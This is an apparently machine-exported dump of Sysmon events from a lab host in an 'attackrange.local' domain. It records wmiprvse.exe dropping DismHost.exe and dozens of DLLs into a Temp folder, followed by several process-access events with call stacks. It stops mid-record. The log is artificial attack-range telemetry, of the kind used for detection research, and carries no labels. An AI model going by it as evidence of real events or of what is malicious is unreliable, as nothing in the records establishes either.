11241100x80000000000000002952Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-processtopology-obsolete-l1-1-0.dll2020-11-03 15:52:00.666 11241100x80000000000000002951Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-processthreads-l1-1-2.dll2020-11-03 15:52:00.666 11241100x80000000000000002950Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-processthreads-l1-1-1.dll2020-11-03 15:52:00.666 11241100x80000000000000002949Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-processthreads-l1-1-0.dll2020-11-03 15:52:00.666 11241100x80000000000000002948Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.666{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-processenvironment-l1-2-0.dll2020-11-03 15:52:00.666 11241100x80000000000000002947Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-processenvironment-l1-1-0.dll2020-11-03 15:52:00.651 11241100x80000000000000002946Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-privateprofile-l1-1-1.dll2020-11-03 15:52:00.651 11241100x80000000000000002945Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-privateprofile-l1-1-0.dll2020-11-03 15:52:00.651 11241100x80000000000000002944Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-namedpipe-l1-1-0.dll2020-11-03 15:52:00.651 11241100x80000000000000002943Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-memory-l1-1-2.dll2020-11-03 15:52:00.651 11241100x80000000000000002942Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-memory-l1-1-1.dll2020-11-03 15:52:00.651 11241100x80000000000000002941Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-memory-l1-1-0.dll2020-11-03 15:52:00.651 11241100x80000000000000002940Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-core-localization-obsolete-l1-2-0.dll2020-11-03 15:52:00.651 11241100x80000000000000002939Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-localization-l1-2-1.dll2020-11-03 15:52:00.651 11241100x80000000000000002938Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-localization-l1-2-0.dll2020-11-03 15:52:00.651 11241100x80000000000000002937Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.651{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-libraryloader-l1-1-1.dll2020-11-03 15:52:00.651 11241100x80000000000000002936Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-libraryloader-l1-1-0.dll2020-11-03 15:52:00.635 11241100x80000000000000002935Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll2020-11-03 15:52:00.635 11241100x80000000000000002934Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Core-Kernel32-Private-L1-1-0.dll2020-11-03 15:52:00.635 11241100x80000000000000002933Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-kernel32-legacy-l1-1-1.dll2020-11-03 15:52:00.635 11241100x80000000000000002932Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-kernel32-legacy-l1-1-0.dll2020-11-03 15:52:00.635 11241100x80000000000000002931Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-io-l1-1-1.dll2020-11-03 15:52:00.635 11241100x80000000000000002930Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-io-l1-1-0.dll2020-11-03 15:52:00.635 11241100x80000000000000002929Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-interlocked-l1-1-0.dll2020-11-03 15:52:00.635 11241100x80000000000000002928Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-Core-Heap-Obsolete-L1-1-0.dll2020-11-03 15:52:00.635 11241100x80000000000000002927Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-heap-l1-1-0.dll2020-11-03 15:52:00.635 11241100x80000000000000002926Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.635{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-handle-l1-1-0.dll2020-11-03 15:52:00.635 11241100x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-core-file-l2-1-1.dll2020-11-03 15:52:00.619 11241100x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\API-MS-Win-core-file-l2-1-0.dll2020-11-03 15:52:00.619 11241100x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-file-l1-2-1.dll2020-11-03 15:52:00.619 11241100x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-file-l1-2-0.dll2020-11-03 15:52:00.619 11241100x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-file-l1-1-0.dll2020-11-03 15:52:00.619 11241100x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-fibers-l1-1-1.dll2020-11-03 15:52:00.619 11241100x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-fibers-l1-1-0.dll2020-11-03 15:52:00.619 11241100x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-errorhandling-l1-1-1.dll2020-11-03 15:52:00.619 11241100x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-errorhandling-l1-1-0.dll2020-11-03 15:52:00.619 11241100x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-delayload-l1-1-0.dll2020-11-03 15:52:00.619 11241100x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.619{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-debug-l1-1-1.dll2020-11-03 15:52:00.619 11241100x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.604{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-debug-l1-1-0.dll2020-11-03 15:52:00.604 11241100x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.604{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-datetime-l1-1-1.dll2020-11-03 15:52:00.604 11241100x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.604{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-datetime-l1-1-0.dll2020-11-03 15:52:00.604 11241100x80000000000000002911Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.604{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-console-l1-1-0.dll2020-11-03 15:52:00.604 11241100x80000000000000002910Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.604{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-comm-l1-1-0.dll2020-11-03 15:52:00.604 11241100x80000000000000002909Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.604{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-core-com-l1-1-0.dll2020-11-03 15:52:00.604 11241100x80000000000000002908Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.604{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\api-ms-win-base-util-l1-1-0.dll2020-11-03 15:52:00.604 11241100x80000000000000002907Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.604{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\WimProvider.dll2020-11-03 15:52:00.604 11241100x80000000000000002906Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.588{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\VhdProvider.dll2020-11-03 15:52:00.588 11241100x80000000000000002905Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.588{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\UnattendProvider.dll2020-11-03 15:52:00.588 11241100x80000000000000002904Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.588{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\TransmogProvider.dll2020-11-03 15:52:00.588 11241100x80000000000000002903Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.588{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\SmiProvider.dll2020-11-03 15:52:00.588 11241100x80000000000000002902Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.572{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\ProvProvider.dll2020-11-03 15:52:00.572 11241100x80000000000000002901Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.572{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\OSProvider.dll2020-11-03 15:52:00.572 11241100x80000000000000002900Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.572{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\OfflineSetupProvider.dll2020-11-03 15:52:00.572 11241100x80000000000000002899Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.572{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\MsiProvider.dll2020-11-03 15:52:00.572 11241100x80000000000000002898Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.572{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\LogProvider.dll2020-11-03 15:52:00.572 11241100x80000000000000002897Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.572{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\IntlProvider.dll2020-11-03 15:52:00.572 11241100x80000000000000002896Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.557{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\ImagingProvider.dll2020-11-03 15:52:00.557 11241100x80000000000000002895Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.557{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\IBSProvider.dll2020-11-03 15:52:00.557 11241100x80000000000000002894Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.557{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\GenericProvider.dll2020-11-03 15:52:00.557 11241100x80000000000000002893Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.557{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\FolderProvider.dll2020-11-03 15:52:00.557 11241100x80000000000000002892Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.557{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\FfuProvider.dll2020-11-03 15:52:00.557 11241100x80000000000000002891Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.525{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\DmiProvider.dll2020-11-03 15:52:00.525 11241100x80000000000000002890Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.525{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\DismProv.dll2020-11-03 15:52:00.525 11241100x80000000000000002889Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:00.525{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\DismHost.exe2020-11-03 15:52:00.525 11241100x80000000000000002888Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.525{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\DismCorePS.dll2020-11-03 15:52:00.525 11241100x80000000000000002887Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.510{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\DismCore.dll2020-11-03 15:52:00.510 11241100x80000000000000002886Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.510{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\CompatProvider.dll2020-11-03 15:52:00.510 11241100x80000000000000002885Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.510{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\CbsProvider.dll2020-11-03 15:52:00.510 11241100x80000000000000002884Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.510{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\AssocProvider.dll2020-11-03 15:52:00.510 11241100x80000000000000002883Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:52:00.494{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\Temp\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\AppxProvider.dll2020-11-03 15:52:00.494 10341000x80000000000000002882Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.369{D28789B6-7C64-5FA1-1000-000000008801}11443384C:\Windows\system32\svchost.exe{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002881Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.369{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002880Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.353{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CA0-5FA1-8B00-000000008801}4296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002879Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 